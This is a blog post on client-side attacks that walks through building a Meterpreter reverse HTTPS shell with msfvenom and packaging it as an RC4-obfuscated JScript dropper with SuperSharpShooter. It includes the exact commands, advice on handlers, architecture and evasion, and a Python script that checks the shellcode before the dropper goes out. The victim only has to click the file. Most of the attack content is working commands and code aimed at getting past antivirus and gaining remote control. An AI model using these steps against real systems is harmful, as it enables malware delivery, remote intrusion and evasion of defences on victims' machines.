Getting Shells on Easy Mode

This forms part of a new series of blog posts looking at client-side attacks and evasion strategies used by hackers.



Running Shell Code in C#


Over the last few weeks, we have been building payloads and droppers manually and in some cases downloading entire libraries just to get a reverse shell. This week we are going to put our feet up and take things a little easier. Enter SuperSharpShooter, a script that you can get from GitHub here:

https://github.com/SYANiDE-/SuperSharpShooter

This tool is based on the original SharpShooter script from MDSec, with some minor changes (notably that it runs under Python 3).


The author describes the tool as a "payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object."


Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.


SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion. The key has to travel with the payload so the script can decrypt it at runtime, so this is obfuscation against static signatures rather than confidentiality. The project also includes the capability to integrate sandbox detection and environment keying to assist in evading detection.


SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp's CodeDom provider.


Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.


SharpShooter targets v2, v3 and v4 of the .NET Framework, which will be found on most end-user Windows workstations; the version is selected with the --dotnetver option when generating the payload.



The Payload



The first step is to create the payload with msfvenom: a Meterpreter reverse HTTPS stager on port 443, written out as raw shellcode to a local file that the SuperSharpShooter script will consume in the next step. The .txt extension is cosmetic; with -f raw the file contains machine code, not text.


msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.60 LPORT=443 -f raw -o /var/www/html/shell.txt



Once the payload has been created, the next step is to run the SuperSharpShooter script, pointing --rawscfile at the raw shellcode file from the previous step. --payload js selects a JScript dropper, --dotnetver 4 targets .NET Framework 4 on the victim, and --output sets the base name of the generated file.


python3 SuperSharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile /var/www/html/shell.txt --output test

Once this has been created, we just need the victim to receive the file and click it. Two things need to be in place first: a Metasploit multi/handler listening on the LHOST and LPORT used above (the stager generated by msfvenom does nothing useful without it), and a script host whose bitness matches the shellcode, since the x64 stager from the first step has to run inside a 64-bit process such as the default wscript.exe on 64-bit Windows. Note that --stageless here refers to SuperSharpShooter's delivery, meaning the shellcode is embedded in the script rather than fetched over Web or DNS; the shellcode itself is still the Meterpreter stager, which downloads the rest of Meterpreter from the handler.
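Before sending the dropper, it is worth checking that the file handed to --rawscfile really is raw shellcode of the right architecture, and it helps to see concretely what the RC4 wrapping mentioned above buys. The following Python script is an added example written for this post, not code from SuperSharpShooter or msfvenom: the prologue bytes it matches are those of Metasploit's x86 and x64 block_api stagers, the RC4 routine is a textbook implementation standing in for whatever SharpShooter uses internally, and the sample shellcode is a constructed stand-in rather than real msfvenom output.

```python
"""Pre-flight checks for the raw shellcode file fed to --rawscfile, plus a
demonstration of RC4 wrapping with a random key.  Added example, not code
from SuperSharpShooter."""
import os
import sys
from typing import List, Optional, Tuple

# Metasploit's block_api stagers open with a recognisable prologue:
#   x86: fc e8 ..              cld; call <next instruction>
#   x64: fc 48 83 e4 f0 e8 ..  cld; and rsp, -0x10; call <next instruction>
X86_PROLOGUE = bytes.fromhex("fce8")
X64_PROLOGUE = bytes.fromhex("fc4883e4f0e8")

# Constructed stand-in for msfvenom output: the real x64 prologue followed by
# filler bytes. It is NOT a working stager; it only lets the script run offline.
CONSTRUCTED_X64 = X64_PROLOGUE + bytes(range(64))


def guess_arch(shellcode: bytes) -> str:
    """Classify shellcode as x86, x64 or unknown from its first bytes."""
    if shellcode.startswith(X64_PROLOGUE):
        return "x64"
    if shellcode.startswith(X86_PROLOGUE):
        return "x86"
    return "unknown"


def looks_raw(shellcode: bytes) -> bool:
    """msfvenom -f raw emits machine code; -f hex, base64 or csharp emit text.
    A file that is almost entirely printable ASCII was saved in the wrong format."""
    if not shellcode:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in shellcode)
    return printable / len(shellcode) < 0.9


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA); encryption and decryption are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation + XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wrap_payload(shellcode: bytes, key: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Encrypt under a fresh random key. The dropper has to carry the key to decrypt
    at runtime, so this hides the bytes from static signatures and nothing more."""
    key = key or os.urandom(16)
    return key, rc4(key, shellcode)


def preflight(shellcode: bytes, expected_arch: str) -> List[str]:
    """Return the problems found; an empty list means the file is ready for --rawscfile."""
    problems = []
    if not looks_raw(shellcode):
        problems.append("file does not look like raw machine code; regenerate with -f raw")
        return problems
    arch = guess_arch(shellcode)
    if arch == "unknown":
        problems.append("no Metasploit stager prologue found; check the payload name")
    elif arch != expected_arch:
        problems.append(f"shellcode is {arch} but the dropper expects {expected_arch}")
    return problems


def main(argv: List[str]) -> int:
    # Usage: python3 preflight.py [/var/www/html/shell.txt] [x64|x86]
    # With no arguments the constructed sample is checked instead of a real file.
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:
            shellcode = fh.read()
    else:
        shellcode = CONSTRUCTED_X64
    expected = argv[2] if len(argv) > 2 else "x64"
    problems = preflight(shellcode, expected)
    for p in problems:
        print("problem:", p)
    key, ciphertext = wrap_payload(shellcode)
    print(f"arch={guess_arch(shellcode)} size={len(shellcode)} key={key.hex()}")
    print("round trip ok:", rc4(key, ciphertext) == shellcode)
    return 1 if problems else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against the file from the msfvenom step (python3 preflight.py /var/www/html/shell.txt x64) before generating the dropper; a non-zero exit means the file was saved in a text format or the architecture does not match the script host you expect to run it in. The random key changes on every run, so the ciphertext bytes differ each time while the decrypted payload is identical, which is exactly why the per-payload RC4 key defeats static byte signatures but does nothing once the script decrypts in memory.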


Video Example






